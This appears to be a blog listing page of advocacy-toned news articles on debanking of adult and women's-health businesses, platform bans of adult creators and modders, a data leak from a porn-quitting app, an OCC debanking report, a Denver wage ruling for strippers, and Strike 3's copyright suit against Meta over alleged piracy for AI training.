Business Attacks

Debanking Explained: How Politics, Policy, and Perception Shape Account Closures

A board with the word debanking.

The Cato Institute has published a report on debanking. You can find it here: https://www.cato.org/policy-analysis/understanding-debanking-evaluating-governmental-operational-political-religious?utm_source=social&utm_medium=email&utm_campaign=Cato%20Social%20Share

Here’s what the report is all about:

Debanking can be a frustrating and deeply unsettling experience. One day everything seems fine, and the next, a notice arrives giving just 30 days to withdraw funds and find a new financial institution. Confusion quickly turns into anxiety. Bills were paid, nothing appeared out of the ordinary — so what changed? A call to the bank rarely brings clarity, and the response is often the same: no further details can be provided. Customers are left with more questions than answers.

On the other side of the conversation, bankers are frequently constrained by strict confidentiality requirements. Even frontline staff may not have access to the underlying reasons for an account closure. Financial institutions operate within a framework of anti–money laundering, know your customer, and countering the financing of terrorism regulations — commonly referred to as AML, KYC, and CFT. While these rules are standard practice within the industry, they remain largely invisible to the public, creating a disconnect that fuels frustration on both sides.

For those looking to address the growing concern around debanking, some argue that meaningful change will require greater transparency. That could mean reconsidering the confidentiality that surrounds account closures, removing reputational risk as a regulatory factor, and reevaluating the Bank Secrecy Act framework that effectively places financial institutions in the role of investigative gatekeepers.

Read More »

When Women’s Wellness Gets Labeled “Adult,” the Bank Account Disappears

A board with the word debanking.

It starts with a quiet email. No warning. No phone call. Just a notice that your account is under review—or worse, closed.

That’s what’s happening to women’s health and sexual wellness companies across the United Kingdom and Europe. Not because they’ve broken laws. Not because they’ve done anything shady. But because somewhere in a compliance department, someone ticked the wrong box and labeled them “adult content.”

New research from two U.K.-based advocacy groups, CensHERship and The Case For Her, digs into what’s really going on. And it’s uncomfortable reading. The report argues that women’s health innovators are being misclassified in financial systems, triggering debanking and account shutdowns that can stall or even sink young companies.

“What we find is that misclassification, over-compliance, cultural discomfort, and outdated policy language combine to create structural barriers for women’s health innovation, and that the identified structural barriers tend to fall into two forms,” the research explains.

Those two forms? “Misclassification” and “misunderstanding.”

Misclassification is described as “where women’s health and sexual wellbeing are misread as adult content. This is the most visible and well-documented form of bias.”

Misunderstanding, on the other hand, is “where women’s health is overlooked as too new, complex, or unfamiliar to fit existing risk templates. These cases are harder to surface because they are often resolved quietly or never formally recorded.”

That second one hits differently. It’s the kind of bias that doesn’t shout. It just shrugs. Too new. Too complex. Too awkward. Next.

Some of the companies affected are household names in the space, including SheSpot, a widely recognized brand. These aren’t fringe operators. They’re mainstream wellness businesses trying to build products around bodies that, frankly, have been underserved for generations.

The report goes further: “Because most financial institutions have never explicitly defined women’s health or FemTech within their risk frameworks, systems default to the nearest analogue—typically adult content, vice categories, or other ‘sensitive’ sectors.”

That line sticks. Systems default. That’s how it happens. No villain twirling a mustache. Just outdated templates and risk models built in eras when women’s sexual health was barely discussed in polite company. So instead of creating a new category, institutions drag these companies into old ones—adult content, vice, high-risk.

It’s lazy. It’s structural. And it’s expensive.

Both CensHERship and The Case For Her argue that outdated classification systems, cultural discomfort, and unconscious bias are creating real barriers to growth. Being labeled “adult content” or “adult services” doesn’t just sound insulting—it places these businesses in a “high-risk sector” alongside firearms manufacturing and tobacco cultivation and marketing.

Think about that for a second. A company developing pelvic health tools or hormone-tracking tech ends up sitting in the same risk bucket as cigarette production.

This isn’t just semantics. Risk labels determine whether you can open a bank account, process payments, attract investors, or scale internationally. When the system quietly decides your innovation is morally adjacent to vice, you feel it everywhere.

Honestly, it raises a bigger question: if financial institutions can’t tell the difference between sexual wellness and adult entertainment, what does that say about the frameworks we’re still operating under?

Maybe the real issue isn’t that women’s health is “too new.” Maybe it’s that the systems judging it are too old.

Read More »

Adult Creators Keep Getting Debanked — And the Fallout Goes Far Beyond Them

Financial discrimination

Your bank may never send you a memo about it, but it’s quietly shaping your life.

Every time you click “buy now,” a small army of institutions decides whether that purchase gets to exist. And for adult creators, that army has been steadily tightening its grip. For years, people in the industry have been warning about financial discrimination and debanking — the sudden closure of accounts, the polite but devastating “we can no longer do business with you.” It’s happening more often now. And it’s happening quietly.

“I don’t know what could happen next or when it might happen,”

Adult VTuber, journalist, and activist Ana Valens says. In just two weeks last November, nearly every platform she relied on either removed her content or suspended her outright. “While my Patreon and Ko-fi were reinstated, I’ve spent the past two months waiting for the other shoe to drop — another Patreon ban, my PayPal deactivated, and so on.” She reached out for explanations. Most platforms couldn’t clearly articulate how she’d violated their terms. Ko-fi didn’t respond until repeated messages finally led to reinstatement.

That kind of uncertainty lingers. It’s like walking on ice that might crack at any moment.

“Deplatforming and debanking are an occupational hazard for any adult content creator,” says Gina, a co-founder of PeepMe, a startup that set out to build a worker-owned creator marketplace. PeepMe was imagined as an alternative to OnlyFans and Patreon — a space where creators could hold equity, elect a democratic board, and receive quarterly profit-sharing dividends.

Gina requested that a pseudonym be used, given her continued work adjacent to the adult industry and the very real fear of financial fallout. “Even still, I’ve never seen someone banned on so many sites before [as Ana has been],” she says.

And it’s not just adult creators feeling the pressure. Companies in oil and gas, cryptocurrency, tobacco, and firearms have also raised concerns about politically motivated debanking. The pushback has grown loud enough that U.S. regulators are now stepping in, attempting to rein in financial discrimination.

Who’s Blocking My Buying?

When you make an online purchase, your money doesn’t travel in a straight line. It passes through layers of gatekeepers. The pipeline often looks like this:

  1. Platform (merchant) websites: where creators earn income — YouTube, Patreon, Etsy, DoorDash, Steam.

  2. Payment processors: companies that route the transaction between card networks and banks — PayPal, Stripe.

  3. Card networks: Visa, American Express, Mastercard — the rule-makers that standardize how buyers and sellers interact.

  4. Your bank and the seller’s bank: Wells Fargo, Bank of America, and so on.

Each step has discretion. Beyond preventing illegal activity, these institutions can decide what kinds of money they’re willing to touch.

“The rules set by card networks are sometimes vague,” says Dr. Val Webber, a postdoctoral researcher at Dalhousie University’s Sexual Health and Gender Research Lab. Mastercard’s June 2025 rules restrict “any Transaction that […] in the sole discretion of [Mastercard], may damage the goodwill of [Mastercard] or reflect negatively on the [brand].”

“In the sole discretion” is doing a lot of work there.

Last summer, Steam and itch.io removed or deindexed adult games after pressure from payment processors and card networks. Steam cited pressure from Mastercard, conveyed through processors like Stripe. Stripe told itch.io, “Stripe is currently unable to support sexually explicit content due to restrictions placed on them by their banking partners, despite card networks generally supporting adult content.” Stripe’s prohibited business list includes “pornography and other mature audience content (including literature, imagery, and other media) designed for the purpose of sexual gratification.”

Mastercard later denied involvement. In August 2025, the company stated, “Mastercard has not evaluated any game or required restrictions of any activity on game creator sites and platforms, contrary to media reports and allegations.”

Meanwhile, Valens saw her articles disappear from Vice. “My suspicion is that it was easy for a financial company to flag me as high risk as a punitive measure for my content, or my activism work,” she says. Attempts to obtain comment from Vice were unsuccessful.

Who Can Get Debanked?

“We have lots of data to show that people in the adult industry face financial discrimination in the form of their accounts being closed, being denied mortgages, business loans, and other banking services — despite banks often not being able to substantiate legal reasons related to these individual accounts,” says Maggie MacDonald, a PhD researcher at the University of Toronto.

The tension escalated in December 2020 when Visa and Mastercard cut ties with Pornhub, citing child sexual abuse material (CSAM). “Our adult content standards allow for legal adult activity created by consenting individuals or studios,” Mastercard said at the time. “Merchants must have controls to monitor, block and remove unlawful content from being posted.” Pornhub denied hosting illegal content and emphasized the harm to “the hundreds of thousands of models who rely on [their] platform for their livelihoods.”

But here’s the inconsistency that nags at people: X continues to process payments despite widespread reports of CSAM and non-consensual deepfake content. No sweeping financial freeze there.

Watching major platforms lose payment relationships makes smaller startups tread lightly. “We just can’t afford to lose our ability to do business with these financial companies,” Gina says. “Stripe takes only 2.9 percent from businesses they’re willing to work with, while high-risk processors willing to take on adult content can charge up to 15 percent.”

That difference can sink a company before it starts.

“Losing a relationship with card networks is a risk payment processors can’t afford, and losing relationships with payment processors is a risk that platform websites can’t afford,” explains Webber. “In the end, the responsibility of ensuring their content stays within the lines of these oftentimes unclear rules trickles down to each individual creator. Because ultimately, content creators are more expendable to platforms than payment processors and card networks.”

One justification often cited is chargebacks — when customers reverse credit card transactions. Gina isn’t convinced.

“Locking out entire industries makes less and less sense as fraud detection technology advances,” she says. “Payment processors and card networks already have processes to step in when an individual business has a high rate of chargebacks, there’s no reason to block out a whole industry.” Mastercard recently announced expanded generative AI fraud-detection tools, building on already sophisticated monitoring systems.

“We also haven’t seen the claim of high-chargebacks in adult content substantiated anywhere in terms of measured data,” adds MacDonald. “As a researcher, that makes me suspicious of the criteria these companies are using behind the scenes.”

The Evolving Landscape of Banking Regulations

In February 2025, the Free Speech Coalition filed a statement with the U.S. House Committee on Financial Services, calling for due process protections, objective risk assessments, and explicit recognition that lawful adult businesses do not inherently present financial crime risk. Blocking entire industries without individualized evaluation, the statement argued, is regulatory overreach with serious implications for free speech.

Multiple efforts are underway in the United States to limit financial institutions from denying service for reasons beyond legal violations. In August 2025, President Donald Trump issued an executive order directing regulators to investigate and reverse politically motivated debanking. Bank regulators have begun removing “reputational risk” from compliance criteria, and proposed Senate legislation would impose civil fines on banks and card networks that avoid entire categories of customers.

“Card networks and payment processors began by blocking pornography, but they’ve moved into other online industries as well,” says Webber. “The line in the sand continues to shift, and it has recently expanded to video game creators and streamers as well. We don’t know how these rules might evolve, and what type of online content might be next.”

Valens has spent months urging customers to call Mastercard, Visa, PayPal, and Stripe to question purchase restrictions and account freezes. Visa points to its policies for combating illegal activity; PayPal requires pre-approval for adult materials, similar to tobacco; Stripe states it does not support adult content.

“Private companies have been deputized to decide how we can earn and spend our money,” says MacDonald. “Anyone who is ideologically misaligned with any of these companies faces the risk of losing their livelihood.”

That’s the part that lingers.

It’s not just about porn, or games, or activism. It’s about the invisible committee that votes on your transactions — and whether one day, without warning, they decide you don’t get a vote at all.

Read More »

Discord Plans Mandatory Age Verification for All Users in 2026

Discord logo

Something quietly fundamental is about to change on one of the internet’s most familiar hangouts. Discord’s senior leadership confirmed this week that age verification will become mandatory for all users starting in March 2026, alongside a shift to what the company calls “teen-by-default” settings across the entire platform.

The expanded safety rollout, according to the company, is meant to create “a safer and more inclusive experience for users over the age of 13.” On paper, it sounds tidy. In practice, it signals a pretty big cultural shift for a platform that’s long felt like the digital equivalent of a messy, unlocked group chat.

“As part of this update, all new and existing users worldwide will have a teen-appropriate experience by default, with updated communication settings, restricted access to age-gated spaces, and content filtering that preserves the privacy and meaningful connections that define Discord,” the company said. It’s a careful balance they’re trying to strike — safety without sanding off the personality that made people show up in the first place.

“Nowhere is our safety work more important than when it comes to teen users, which is why we are announcing these updates in time for Safer Internet Day,” said Savannah Badalich, Discord’s head of product policy, referencing the February 10 awareness initiative. “Rolling out teen-by-default settings globally builds on Discord’s existing safety architecture, giving teens strong protections while allowing verified adults flexibility.”

Badalich added, “We design our products with teen safety principles at the core and will continue working with safety experts, policymakers, and Discord users to support meaningful, long-term wellbeing for teens on the platform.” It’s the kind of statement you’d expect — earnest, forward-looking, and clearly written with regulators peeking over shoulders.

Under the new “teen-by-default” framework, users will have to go through age-verification steps to access channels and servers labeled as “age-restricted.” That includes spaces run by adult content creators, online sex workers, sexually themed communities, sexual animation hubs, and certain fan communities that live closer to the edges of the platform.

There’s also an unspoken tension here that’s hard to ignore. Discord has been down this road before, and not without bruises.

The platform previously experienced a data breach involving one of its age-verification vendors, exposing sensitive verification materials, including government-issued identification. For users who already feel uneasy about handing over personal documents online, that memory hasn’t exactly faded.

That incident stemmed from mistakes by a customer experience vendor, 5CA, which outsources work to customer service agents in countries including the Philippines. Discord’s primary age-verification partner, K-ID, later stated that it had no involvement in the breach tied to its standard verification systems.

So here we are again — a platform promising better protection, safer defaults, and stronger guardrails, while carrying the weight of past missteps. Maybe this time the systems hold. Maybe trust rebuilds. Or maybe the internet does what it always does and asks the same old question, just in a new tone: how much safety is worth how much control?

Read More »

App Meant to Help Users Quit Porn Leaked Their Masturbation Habits

Hand and porn site

There’s something quietly disturbing about discovering that a tool meant to help people wrestle with their most private habits accidentally left the blinds wide open. An app that claims to help users stop consuming pornography ended up exposing intensely sensitive personal data — the kind of stuff most people wouldn’t even admit to a close friend. Ages. Masturbation frequency. Emotional triggers. How porn makes them feel afterward. And tucked inside that data were a lot of minors, which makes your stomach drop a little when you really sit with it.

One user profile, for instance, listed their age as “14.” Their “frequency” showed porn use “several times a week,” sometimes up to three times a day. Their “triggers” were logged as “boredom” and “Sexual Urges.” The app had even assigned a “dependence score” and listed their “symptoms” as “Feeling unmotivated, lack of ambition to pursue goals, difficulty concentrating, poor memory or ‘brain fog.’” It reads less like analytics and more like a vulnerable diary entry — something that was supposed to stay locked away.

The app isn’t being named because the developer still hasn’t fixed the issue. The problem was uncovered by an independent security researcher who asked to remain anonymous. He first flagged it to the app’s creator back in September. The creator said he’d fix it quickly. That didn’t happen. The flaw comes from a misconfiguration in how the app uses Google Firebase, a popular mobile app development platform. By default, Firebase can make it surprisingly easy for anyone to become an “authenticated” user and access backend storage — the digital attic where all the private boxes tend to live if you’re not careful.

Overall, the researcher said he could access information belonging to more than 600,000 users of the porn-quitting app, with roughly 100,000 identifying as minors. That number lands heavy. It’s not abstract. It’s classrooms. It’s school buses. It’s kids who probably assumed they were talking into a void, not a wide-open window.

The app also invites users to write confessions about their habits. One of them read: “I just can’t do this man I honestly don’t know what to do know more, such a loser, I need serious help.” You can almost hear the frustration in that sentence — the messy spelling, the emotional spill. That’s not data. That’s a human having a rough night.

When reached by phone, the creator of the app said he had spoken with the researcher but claimed the app never exposed any user data due to a misconfigured Google Firebase. He suggested the researcher may have fabricated the data that was reviewed.

“There is no sensitive information exposed, that’s just not true,” the founder said. “These users are not in my database, so, like, I just don’t give this guy attention. I just think it’s a bit of a joke.”

When asked why he previously thanked the researcher for responsibly disclosing the misconfiguration and said he would rush to fix it, he wished me a good day and hung up. One of those conversations that ends abruptly, leaving a strange quiet buzzing in the room.

After the call, an account was created on the app. The researcher was then able to see that new account appear inside the misconfigured Google Firebase environment — confirmation that user information was still exposed and accessible. Sometimes reality has a way of answering arguments faster than any debate ever could.

This type of Google Firebase misconfiguration isn’t new. Security researchers have been talking about it for years, and it continues to surface today. It’s one of those problems that feels boring until it suddenly isn’t — until someone’s real life data is sitting out in the open.

Dan Guido, CEO of cybersecurity research and consulting firm Trail of Bits, said in an email that this Firebase issue is “a well known weakness” and easy to find. He recently noted on X that Trail of Bits was able to build a tool using Claude to scan for this vulnerability in just 30 minutes.

“If anyone is best positioned to implement guardrails at scale, it is Google/Firebase themselves. They can detect ‘open rules’ in a user’s account and warn loudly, block production configs, or require explicit acknowledgement,” he said. “Amazon has done this successfully for S3.” S3 is a cloud storage product from AWS that previously struggled with similar data exposure issues due to misconfigurations.

The researcher who uncovered the app’s vulnerability added that this insecure setup is often the default in Google Firebase. He also pointed a finger at Apple, arguing that apps should be reviewed for backend security issues before being allowed into the App Store.

“Apple will literally decline an app from the App Store if a button is two pixels too wide against their design guidelines, but they don’t, and they don’t check anything to do with the back end database security you can find online,” he said. It’s one of those comments that lands with an uncomfortable kind of truth — polished surfaces, shaky foundations.

Apple and Google did not respond to requests for comment.

And that’s the part that lingers. People trusted this app with their most awkward truths, their late-night regrets, their quiet attempts at self-control. Some of them were kids. They weren’t posting for an audience. They were whispering into what they thought was a locked room. Turns out the door was never really closed.

Read More »

GitHub Purges Adult Game Developers, Offers No Explanation

Anime two women

Something strange started rippling through a small, niche corner of the internet not long ago. Developers who build mods and plugins for hentai games and even interactive sex toys began waking up to missing repositories, locked accounts, and dead links. GitHub, the place many of them had treated like home base, had quietly pulled the rug out. No warning. No explanation. Just… gone.

From conversations within the community, the rough headcount quickly took shape: somewhere between 80 and 90 repositories, representing the work of roughly 40 to 50 people, vanished in a short window. Many of the takedowns seemed to cluster around late November and early December. A large number of the affected accounts belonged to modders working on games from Illusion, a now-defunct Japanese studio known for titles that mixed gameplay with varying degrees of erotic content. One banned account alone reportedly hosted contributions from more than 30 people across 40-plus repositories, according to members of the modding scene.

What made the situation feel especially surreal was the silence. Most suspended developers say they were never told which rule they’d broken—if any. Their accounts simply stopped working. Several insisted they’d been careful to stay within GitHub’s acceptable use guidelines, avoiding anything overtly explicit. The code was functional, technical, sometimes cheeky in naming, but never pornographic. At least, not in the way most people would define it.

“Amongst my repositories there were no explicitly sexual names or images anywhere in the code or the readme, the most suggestive naming would be on the level of referencing the dick as ‘the men thing’ or referencing the sex as ‘huffing puffing,’” one developer, Danil Zverev, told me. He makes plugins for an Illusion game called Koikatsu. Zverev said he’s been using Github for this purpose since 2024, but on November 18, his Github page was “completely deleted,” he said. “No notifications anywhere, simply a 404 error when accessing the page and inability to log in on the web or in the mobile app. Also it does not allow me to register a new account with the same name or email.”

The timing raised eyebrows. GitHub had updated its acceptable use policies in October 2025, adding language that forbids “sexually themed or suggestive content that serves little or no purpose other than to solicit an erotic or shocking response, particularly where that content is amplified by its placement in profiles or other social contexts.” The policy explicitly bars pornographic material and “graphic depictions of sexual acts including photographs, video, animation, drawings, computer-generated images, or text-based content.”

At the same time, the policy leaves room for interpretation. “We recognize that not all nudity or content related to sexuality is obscene. We may allow visual and/or textual depictions in artistic, educational, historical or journalistic contexts, or as it relates to victim advocacy,” GitHub’s terms of use state. “In some cases a disclaimer can help communicate the context of the project. However, please understand that we may choose to limit the content by giving users the option to opt in before viewing.”

The Anti-Porn Crusade That Censored Steam and Itch.io Started 30 Years Ago

Keywords and tags have never been a useful metric for distilling nuance. Pushing for regulations based on them is repeating a 30-year history of porn panic online.

SAMANTHA COLE

Zverev didn’t bother appealing. He said writing to support felt pointless and chose instead to move on to another platform. Others tried to fight it—and found themselves stuck in limbo.

A developer who goes by VerDevin, known for Blender modding guides, utility tools, and plugins for the game Custom Order Maid 3D2, said users began reporting trouble accessing his repositories in late October. Oddly, he could still see his account when logged in, but not when browsing while logged out.

“Turned out, as you already know, that my account was ‘signaled’ and I had to purposefully go to the report section of Github to learn about it. I never received any notifications, by mail or otherwise,” VerDevin told me. “At that point I sent a ticket asking politely for clarifications and the proceedings for reinstatement.”

The response from GitHub Trust & Safety was vague and procedural: “If you agree to abide by our Terms of Service going forward, please reply to this email and provide us more information on how you hope to use GitHub in the future. At that time we will continue our review of your request for reinstatement.”

VerDevin replied the next day, agreeing to comply and offering to remove whatever GitHub considered inappropriate—despite still not knowing what that was. “I did not take actual steps toward it as at that point I still didn’t know what was reproach of me,” they said.

A full month passed before GitHub followed up. “Your account was actioned due to violation of the following prohibition found in our Acceptable Use Policies: Specifically, the content or activity that was reported included multiple sexually explicit content in repositories, which we found to be in violation of our Acceptable Use Policies,” GitHub wrote.

“At that point I took down several repositories that might qualify as an attempt to show good faith (like a plugin named COM3D2.Interlewd),” they said. GitHub restored the account on December 17—weeks later, and just one day after additional questions were raised about the ban—but never clarified which content had triggered the action in the first place.

Requests for explanation went unanswered. Even when specific banned accounts were flagged to GitHub’s press team, the response was inconsistent. Some accounts were reinstated. Others weren’t. No clear reasoning was ever shared.

The whole episode highlights a problem that feels painfully familiar to anyone who’s worked on the edges of platform rules: adult content policies that are vague, inconsistently enforced, and devastating when applied without warning. These repositories weren’t fringe curiosities—they were tools used by potentially hundreds of thousands of people. The English-speaking Koikatsu modding Discord alone has more than 350,000 members. Another developer, Sauceke, whose account was suspended without explanation in mid-November, said users of his open-source adult toy mods are now running into broken links or missing files.

“Perhaps most frustratingly, all of the tickets, pull requests, past release builds and changelogs are gone, because those things are not part of Git (the version control system),” Sauceke told me. “So even if someone had the foresight to make mirrors before the ban (as I did), those mirrors would only keep up with the code changes, not these ‘extra’ things that are pretty much vital to our work.”

GitHub eventually reinstated Sauceke’s account on a Tuesday—seven weeks after the original suspension—following renewed questions about the bans. Support sent a brief note: “Thank you for the information you have provided. Sorry for the time taken to get back to you. We really do appreciate your patience. Sometimes our abuse detecting systems highlight accounts that need to be manually reviewed. We’ve cleared the restrictions from your account, so you have full access to GitHub again.”

Even so, the damage lingers. In Sauceke’s account and others, including the IllusionMods repository, release files remain hidden. “This makes the releases both inaccessible to users and impossible to migrate to other sites without some tedious work,” Sauceke said.

Accounts may come back. Repositories might be restored. But for many developers, the trust is already gone—and that’s the kind of thing that doesn’t reinstall quite so easily.

GitHub isn’t just another code host—it’s the town square for open-source developers. For adult creators especially, who are used to being quietly shoved to the margins everywhere else, visibility there actually matters. It’s how people find each other, trade ideas, and build something that feels bigger than a solo side project. “It’s the best place to build a community, to find like-minded people who dig your stuff and want to collaborate,” Sauceke said. But if this wave of bans stretches beyond hentai game and toy modders, they warned, it could trigger a slow exodus. Some developers aren’t waiting around to find out, already packing up their repositories and moving them to GitGoon, a platform built specifically for adult developers, or Codeberg, a nonprofit, Berlin-based alternative that runs on a similar model.

Read More »

Nevada’s Legal Sex Workers Claim They’re Being Muted on X

Beautiful woman on bed

It didn’t happen slowly. It wasn’t subtle. Within the past month, legal Nevada sex workers have been hit with a sudden, sweeping wave of account suspensions on X, the platform once known as Twitter. Not for doing anything illegal. Not for soliciting crimes. These are licensed workers, operating in the only state where brothel-based sex work is legal — and yet their voices are vanishing from a platform that once wrapped itself in the language of free speech.

That promise came straight from Elon Musk himself when he set his sights on buying Twitter. At the time, he framed the platform as something almost sacred, saying:

“Free speech is the bedrock of a functioning democracy, and Twitter is the digital town square.”

He followed that with another line meant to reassure skeptics:

“By ‘free speech’ I simply mean that which matches the law.”

By that definition, Nevada sex work clearly qualifies.

Prostitution is legal in Nevada when it takes place inside licensed brothels, as outlined in Nevada Revised Statutes 201.354. Counties are empowered to license and regulate these brothels under Nevada Revised Statutes 244.345, while workers comply with additional health and safety standards set by the state. At present, six counties operate legal brothels. This isn’t a loophole or a gray area — it’s a fully regulated, lawful industry.

At first glance, it might look like X is simply enforcing broad rules around adult content. But the reality cuts deeper. When legal Nevada sex workers lose their accounts, they’re erased from public conversation — conversation that increasingly lives and breathes on platforms like X. What’s left behind is a so-called “digital town square” where only certain voices are allowed to stay standing.

Nevada sex workers understand exactly what’s at stake when they’re shut out. Not long ago, anti-brothel groups attempted to dismantle the legal system through ballot initiatives. When voters heard directly from sex workers, those efforts failed — decisively. In the 2018 Lyon County referendum, for example, nearly 80 percent of voters rejected a proposed brothel ban.

That wasn’t an accident. When sex workers are able to speak publicly, explain how the licensed system actually functions, and share their lived experiences, people listen. Voters learn about the safeguards, the structure, and why legal brothels exist in the first place — not from headlines or fear campaigns, but from the people inside the system.

Silencing those voices on X means the public hears less from those with firsthand knowledge. Anti-sex-work narratives remain visible, amplified, and largely unchallenged. The workers most affected by stigma and policy decisions fade into the background.

This isn’t just about clumsy algorithms sweeping up adult content. It’s about who gets to participate in conversations that can shape laws, livelihoods, and lives. Platforms don’t just host debate — they quietly curate it by deciding who stays and who disappears.

When licensed Nevada sex workers are removed from social media, the public square stops reflecting reality. The debate tilts. The story becomes one-sided. And the people whose livelihoods are on the line — most of them women — lose the chance to speak for themselves.

Maybe that’s the most unsettling part. If this can happen to a group operating legally, transparently, and within the law, it raises an uncomfortable question: who’s next when an algorithm decides a voice is inconvenient?

Read More »

U.S. OCC Releases Preliminary Report on Debanking

OCC Debanking Report

Some mornings, the news hits you like a jolt of cold water — shocking at first, then oddly clarifying. That’s how it felt when the U.S. Office of the Comptroller of the Currency (OCC) dropped a preliminary report on debanking, finally calling out what so many in the adult industry have been living with for years. It’s strange to feel victorious over a problem you never should’ve had in the first place, but here we are, holding something that looks a lot like validation.

The OCC names nine major banks — the kind everyone’s parents told them were “safe,” including Chase, Wells Fargo, and Bank of America — for potentially violating the President’s Executive Order against discriminating toward people engaged in “lawful business activities.” Reading it, I had one of those moments where you want to underline every other sentence because someone, somewhere in government, actually said the quiet part out loud. The OCC states that the adult industry, among others, was subjected to “inappropriate distinctions” when trying to access basic financial services:

“The OCC’s preliminary findings show that, between 2020 and 2023, these nine banks made inappropriate distinctions among customers in the provision of financial services on the basis of their lawful business activities by maintaining policies restricting access to banking services… For example, the OCC identified instances where at least one bank imposed restrictions on certain industry sectors because they engaged in ‘activities that, while not illegal, are contrary to [the bank’s] values.’ Sectors subjected to restricted access included oil and gas exploration, coal mining, firearms, private prisons, tobacco and e-cigarette manufacturers, adult entertainment, and digital assets.”

Seeing adult entertainment listed there — not as a punchline, not as an afterthought, but as a recognized target of discrimination — is surreal. It’s proof that the federal government isn’t just aware of the problem; it’s saying, pretty plainly, that the problem matters. That we matter. And for once, the burden shifts off the people running these businesses and onto the banks that have quietly punished them under the guise of “values.”

This marks the first time in a long time that the adult industry isn’t shouting into the void. The OCC has confirmed that we’re covered under the Executive Order. Banks now know that the old playbook — the one where they shut down accounts for “reputational risk” and shrug — might actually put them on the wrong side of federal policy.

There’s still a road ahead, of course. In the coming weeks and months, the OCC will move into the rule-making phase, and that’s where the shape of all this becomes real. We’ll learn more as they flesh out the details, and so will everyone who’s been denied a basic checking account simply for doing legal work that made some executive squeamish. But for the first time in years, there’s a crack of daylight. Maybe — just maybe — we’re watching the beginning of the end of a discrimination problem that never should’ve existed in the first place.

And honestly? It’s about time the people holding the money had to explain themselves.

Read More »

Denver Says Strippers Are Workers — and Must Be Treated That Way

Stripper

Sometimes a ruling hits the news and you can almost feel the collective exhale from people who’ve been waiting far too long to be treated like… well, workers. That’s what happened in Denver, where a district judge decided that strip club entertainers — dancers, performers, the people who carry the whole night on their shoulders — are employees. Real employees. Which means they’re covered by the city’s labor protections and the standard minimum hourly wage that everyone else in the consolidated city and county is supposed to receive.

The decision backs up what a Denver Auditor’s Office hearing officer had already determined while digging into wage theft claims at several strip clubs around town — including big names like the local Rick’s Cabaret branch, PT’s Showclub, PT’s Showclub Centerfold and the Diamond Cabaret. You know the places: neon lights, velvet corners, the kind of spots that thrive on performance yet somehow never wanted to acknowledge the performers as actual staff.

Attorneys for the clubs kept insisting that entertainers were exempt from Denver’s employment-law umbrella, as if the entire job existed in some hazy loophole. But the ruling cut through that fog. It confirmed what the Auditor’s Office has been saying for years: strippers and erotic performers deserve the same wage protections as anyone else clocking in across the city.

“Our office enforces wage theft laws for all industries and protects anyone performing work in Denver. Adult entertainment workers are no different, and we are pleased the courts agree,” said Timothy M. O’Brien, the elected city auditor who oversees Denver Labor. And honestly, hearing that felt like a long-overdue moment of someone naming the obvious.

Denver Labor, by the way, does its job through law enforcement, education and certified audits — the kind of behind-the-scenes work most people don’t think about until it hits the headlines or their paycheck.

“Entertainers are workers and, therefore, are entitled to the fundamental protections of Denver’s wage ordinances,” reads an informational page on O’Brien

Read More »

Strike 3 Fires Back, Dismissing Meta’s “Personal Use” Claim in AI Battle

Meta logo

There’s a strange kind of déjà vu when a major tech company gets accused of dipping into the piracy pool — that uneasy feeling like we’ve been here before, even though each case somehow feels bigger than the last. That’s the energy swirling around the latest clash between Vixen Media Group owner Strike 3 Holdings and Meta, after Meta asked a federal judge in Northern California to toss their lawsuit.

Strike 3 didn’t pull any punches in its original complaint. They say Meta didn’t just accidentally stumble across their movies online — they accuse the company of deliberately scooping up VMG content from pirate sites to help train its AI systems. And they’re specific about it. BitTorrent, they say, is where those downloads came from. It’s the kind of accusation that makes you imagine a massive tech company hunched over a torrent client, pretending to be invisible.

Meta’s response in October? A very different story — one that almost sounds like a shrug. They told the court that if videos were downloaded, the timing and the number of those downloads “point solely to personal use, not AI training.” And then came the eyebrow-raising line:

“Meta contractors, visitors, or employees may have used Meta’s internet access over the years to download videos for personal use.”

In other words: Hey, people do stuff on our Wi-Fi. Not our problem.

Meta insisted the download activity — the volume, the pattern — just didn’t look like anything tied to large-scale AI development and “is plainly indicative of private personal use.”

They also brushed aside Strike 3’s attempt to link non-Meta IP addresses to the company, calling it a stretch.

Strike 3 fired back this week, and you can almost hear the disbelief between the lines. Their response to the “employees were just downloading porn” defense was blunt:

“Meta’s excuse that employees must be infringing Plaintiffs’ copyrights for ‘personal use’ does not fit the facts.”

What they say does fit the facts?

Something far more coordinated — something algorithmic. They point to what they call “unique patterns of Meta’s piracy,” arguing those patterns don’t look like a person casually searching for adult videos. Instead, Strike 3 claims the behavior “not only indicate[s] the use of a universal ‘script’ (likely developed, supplied, or encouraged by Meta), but also show[s] that the BitTorrent downloads are ‘for AI training data and not for personal use.’”

They bolster that argument with another recent copyright case: Kadrey v. Meta Platforms, Inc.

In that suit, Meta “admitted to using BitTorrent to obtain digital copies” of books for AI training — and Strike 3 alleges that the same IP addresses used in the book-related downloads also appear in their own infringement logs. According to them, Meta even acknowledged in that case that it masked its corporate IPs to avoid detection.

And then comes one of the more striking accusations (no pun intended):

“Plaintiffs were able to correlate Meta’s infringement through its Corporate IPs to six hidden data centers that were used to engage in massive infringement of both Plaintiffs’ and the Kadrey plaintiffs’ works as well. The scale of these infringements is staggering and are ‘beyond what a human could consume.’”

Strike 3 says activity from those masked IP addresses mirrors the activity from Meta’s known corporate IP blocks — a kind of digital fingerprinting that, in their telling, points to one conclusion: these downloads were never about personal viewing habits. “Those ends,” they write, “were to train Meta’s AI and not for the personal use of its employees.”

And if the court believes that interpretation?

Meta wouldn’t just be facing another infringement spat. The numbers involved are enormous — the complaint lists at least 2,396 allegedly infringed movies. Multiply that by the maximum statutory damages of $150,000 per work, and you land at a number that barely feels real: $359.4 million.

But the money, oddly enough, may not be the part that echoes the loudest. This lawsuit drops the adult industry directly into the center of the broader fight over whether training an AI model on copyrighted material counts as “fair use” — or whether it’s just a slicker version of old-school piracy wearing a futuristic badge.

No one really knows yet how courts will treat AI training that leans on protected works. Everyone’s waiting for the first big ruling — the one that will set the tone for all the cases piling up behind it. And maybe that’s the real story here: not just whether Meta downloaded some videos, but whether we’re watching the early days of a legal shift that’s going to redraw the boundaries of ownership, creativity, and machine learning.

Because if AI is the future, then this messy, uncomfortable question is coming along for the ride whether Silicon Valley likes it or not.

Read More »